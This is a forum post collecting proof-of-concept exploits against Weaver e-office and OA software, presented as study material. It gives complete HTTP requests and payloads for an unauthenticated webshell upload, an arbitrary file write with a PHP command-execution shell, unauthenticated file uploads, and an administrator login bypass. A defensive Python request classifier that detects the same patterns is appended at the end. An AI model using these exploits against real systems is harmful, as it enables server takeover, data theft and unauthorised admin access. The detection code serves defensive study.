DecoyMini Technical Exchange Community
[2022HW] Weaver (泛微) vulnerability PoC collection

Posted by 论坛管理 on 2022-8-4 10:17:44

The content of this post was collected from the Internet; it must not be used for illegal purposes and is provided for study only!

1. Weaver eoffice10 unauthenticated getshell

Version file: eoffice10/version.json

Upload form:

<form method="post"
  action="http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
  enctype="multipart/form-data">
  <input type="file" name="FileData"/><br/><br/>
  <input type="text" name="FormData" value="1"/><br/><br/>
  <button type="submit" value="上传">上传</button>
</form>

Shell: http[:]//XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

Request:

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg

<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"

{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--

2. Weaver E-office do_excel.php arbitrary file write

URL:

/WWW/general/charge/charge_list/do_excel.php

Payload:

html=<?php system($_POST[pass]);?>

3. Weaver OA uploaderOperate.jsp file upload

/workrelate/plan/util/uploaderOperate.jsp has a file-upload vulnerability.

Request:

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"

1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"

Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"

1
------WebKitFormBoundarymVk33liI64J7GQaK--

/defaultroot/officeserverservlet is confirmed as a known historical vulnerability (file upload).

Place the file under the website root directory, then replace the fileid in the request.

Request:

POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207

------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"

{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK--

4. Weaver OA 0day: arbitrary administrator login

URL:

/mobile/plugin/VerifyQuickLogin.jsp

Payload:

identifier=1&language=1&ipaddress=
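As an added defensive example that is not part of the original post: a small request classifier that matches the endpoint paths and payload markers from the four PoCs above against raw HTTP requests, the way a WAF or IDS sees them, so that a SOC can flag these patterns while leaving ordinary use of the same endpoints alone. It assumes full request capture (query string and body), and the host name oa.example.internal and the sample requests are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Endpoint paths from the PoCs in this post, each with a payload pattern that
# separates the abuse from ordinary use of the same page.
RULES = [
    ("eoffice10 OfficeServer.php webshell upload", r"/iWebOffice2015/OfficeServer\.php$",
     r"SAVEFILE.*FILENAME['\"]?\s*:\s*['\"][^'\"]+\.(?:php\d?|phtml|phar)\b"),
    ("E-office do_excel.php arbitrary file write", r"/general/charge/charge_list/do_excel\.php$",
     r"<\?(?:php|=)"),
    ("OA uploaderOperate.jsp unauthenticated upload", r"/workrelate/plan/util/uploaderOperate\.jsp$",
     r'name="Filedata"'),
    ("OA OfficeServer INSERTIMAGE request", r"/(?:OfficeServer|officeserverservlet)$",
     r"INSERTIMAGE"),
    ("OA VerifyQuickLogin.jsp admin login bypass", r"/mobile/plugin/VerifyQuickLogin\.jsp$",
     r"(?:^|&)identifier="),
]

def parse_request(raw: str):
    """Return (method, path, payload); payload = query string + body, URL-decoded where form-encoded."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target = head.split("\n")[0].split(" ")[:2]
    path, _, query = target.partition("?")
    ctype = re.search(r"^content-type:(.*)$", head, re.I | re.M)
    if ctype and "x-www-form-urlencoded" in ctype.group(1):
        body = unquote_plus(body)
    return method, path, unquote_plus(query) + "\n" + body

def match_rules(raw: str) -> list[str]:
    """Names of the PoC patterns that one raw HTTP request matches (empty list if none)."""
    _, path, payload = parse_request(raw)
    flags = re.I | re.S | re.M
    return [name for name, path_re, body_re in RULES
            if re.search(path_re, path, flags) and re.search(body_re, payload, flags)]

# Constructed sample requests (not captured traffic), modelled on PoC 1 and PoC 2 above.
BOUNDARY = "------WebKitFormBoundaryTEST"
def multipart(path: str, fields) -> str:
    """Build a multipart/form-data POST from (content-disposition, value) pairs."""
    parts = [f"{BOUNDARY}\nContent-Disposition: form-data; {disp}\n\n{val}" for disp, val in fields]
    return (f"POST {path} HTTP/1.1\nHost: oa.example.internal\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY[2:]}\n\n"
            + "\n".join(parts) + f"\n{BOUNDARY}--\n")

SHELL_UPLOAD = multipart("/eoffice10/server/public/iWebOffice2015/OfficeServer.php", [
    ('name="FileData"; filename="1.jpg"', "<?php echo md5(1);?>"),
    ('name="FormData"', "{'OPTION':'SAVEFILE','FILENAME':'test.php'}")])
EXCEL_WRITE = ("POST /WWW/general/charge/charge_list/do_excel.php HTTP/1.1\n"
               "Host: oa.example.internal\nContent-Type: application/x-www-form-urlencoded\n\n"
               "html=%3C%3Fphp+phpinfo%28%29%3B%3F%3E")
```

A legitimate SAVEFILE of a .docx through the same OfficeServer.php endpoint produces no hit, which is what keeps the first rule usable on a busy OA server.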
